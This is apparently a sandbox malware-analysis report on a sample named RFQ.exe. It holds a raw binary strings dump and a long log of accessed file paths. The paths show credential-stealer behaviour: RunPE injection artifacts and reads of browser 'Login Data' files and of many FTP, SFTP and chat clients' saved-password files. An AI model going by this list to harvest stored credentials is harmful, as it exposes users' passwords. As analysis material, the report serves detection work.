%nW7i0itntr5PVhoJmJqgqMNhooxyrFe9EyFmO
pz Y6
K#3
?~!K!J
cy6s
y)v0L
KKbK?K
IBKIJY
tKKKK
K	K9K$K<K8K.K9KKKKK
l_E
o{KK
0p*d
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
pp+]
.K9K=K.K9KKKKK
XffGY
e6UxAPF3
KKKKK#??;qddK#??;8qddKKKKdKKKqKKKs{KKnK8KKKKK.K3K.KKK
'oWJ?Y
LCK#J
\^c02
?9Ak
'$8.
}KuK
K"K(K9K$K8K$K-K?K
A4KJK
6_K?+
2;.uFAkkkkkkw
K?K*K9K?K>K;K
Obt?m
JZKH
o(K0
OotKK
g}<t
"8*''$<
K%K(K9K.K/K"K
Oemk
K"K?K9K"K$KKKKKK$K$K,K'K.K
$%?*"%8K.?
brKK
KeK/K)KKKKKKKK
=KKKK
9",,.98uFAkkw
v[lKKD
KKjJ
$<%'$*/.9
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
9$(.88K
IKKMIKK
J5Cx
!\!K#
uK?3
oOKK>
JKHKM
KJKK9
JKHKK
WyyLqJV8C2Xcqlbr67ls
NkKZ
#[k[K
.98"$%vye{e{e{gk
uK?C
Gpv_
4KKIKKKKKKKKKKKJKAKKKKKIKKKKKKKKKKKJK[OKKKKJKKKKKKKKKKKKK
tei3
K"K9KKKKKKKKK
Zb/
A_KvKAK_K
;8OtK
KJKK-
SKKK
TQ&>
i(\zh
M?E-p
paYE
f@Mu
K.K9K8K"K$K%KKK{KeK{KeK{KeK{KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKOKGKKKG{KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKCJKKKKKKK
ua7ua7k[
.'.?.
ZsPPMHESwIwgxq26JVLSLe4Xzwbk6X0
K$K%K-K"K,KkK
$"%?K.?
0#iG`B
#;"
K
#H-KK
oyLSCqa91JZSu9U4i9XrUs9Skl
MMMm
VHBNAJZ
K8K"K,K%K$K%K8KeK8K:K'K"K?K.KKK8K"K,K%K$K%K8KeK?K3K?KKK8K"K,K%K$K%K8KyKeK?K3K?KKKKK8K"K,K%K$K%K8KxKeK?K3K?KKKKKnK8K
K2K)K.K9K/K>K(K KKKKK>K8K.K9KeK(K$K%K-K"K,KKKnK8K
System.Windows.Forms
($&e
WHtK{vKKKK[K$
!Q!K!K#
*&.K.?K.?
QX<
-)f'
%-$K/<
#k1
K
Z_SZ_S
nwd
9,>&.%?8uFAkkkkwd
#_/
K
2;.u
9$?.(?"$%K
LCK'J(LCK;J#LCK?J&LCK3J9LBK
%j}]
Yl=
'oWJ>
"1.K';
"m6X
9.*?.KKJKKq	X:
K;K*K8K8K<K$K9K/K
-*9"
KxKeK/K'K'KKK
HUXg
"MOXSHBEcVR3tVHt0LsAhr0Ygk2JnPGceuN
F:c%
;KKKK
LeQl(
KKKK[Kd&zOtK'
3"?K$;
C~\>S
??9")>?.8K8.?
EsPD
8
??*(#./K
KvKIC
K?frv
KKKK[K 4
K9K$K-K"K'K.KnK"KKK
2;.K
2v$
$&;"'.9.%.9*?./
??9")>?.K
!K!M#
*>'?
9..KKK
cO}!
$*/K,.?
Tc5C
pKKK
K?F
K*K?K.K9K-K$K3KKK------
COKK
S!K!K
#KKK
b~[1
*%*,.&.%?
=.98"$%K;*88<$9/
K%K'K2K
FJI
#WEN83973Ox5lo9B8VyXjOmSljppdfv70l8k
FLMY
!Sjd5LcmJBpq5kWFX7OOAHwQJBLhcBMSES
m
4D
k.%(92;?./
K$K%K K.K2KKKKKnK8K
KKK!#K{KK
K$K8K?K8KKKKK
[prLY
dF*Z
$*/K	2?.
99*2
LMKl
/\KK#JKK
!;'y
*MUZ5W
Tw)6
I]KK
\,7u
K K.K2K(K#K*K"K%KeK;K'K"K8K?KKKKKKKKKnK8K
4
E#
$?84
KJKGuKKKK[Kb[
wAKJK??KKKK
)!.(?K
(KKK
$&;"'*?"$%
K'K>K8KKKKKK$K$K,K'K.K
*"?
$9

18 Behaviors detected by system signatures

10 Summary items with data

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\RFQ.exe.config
C:\Users\Seven01\AppData\Local\Temp\RFQ.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\RFQ.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\RFQ.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol28.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\RFQ#35242411.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\RFQ#35242411.resources\RFQ#35242411.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\RFQ#35242411.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\RFQ#35242411.resources\RFQ#35242411.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\RFQ#35242411.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\RFQ#35242411.resources\RFQ#35242411.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\RFQ#35242411.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\RFQ#35242411.resources\RFQ#35242411.resources.exe
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2692.32534109
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2692.32534125
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2692.32534312
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMustang Browser\Login Data
C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalOrbitum\Login Data
C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalIridium\Login Data
C:\Users\Seven01\AppData\LocalIridium\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Seven01\AppData\Roaming\Opera
C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
C:\Users\Seven01\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions
C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Seven01\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Seven01\AppData\Roaming\Cyberduck
C:\Users\Seven01\AppData\Roaming\iterate_GmbH
C:\Users\Seven01\.config\fullsync\profiles.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Seven01\AppData\Roaming\Ipswitch
C:\Users\Seven01\site.xml
C:\Users\Seven01\AppData\Local\PokerStars*
C:\Users\Seven01\AppData\Local\ExpanDrive
C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Seven01\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Seven01\AppData\Roaming\SmartFTP
C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Seven01\Documents\*.tlp
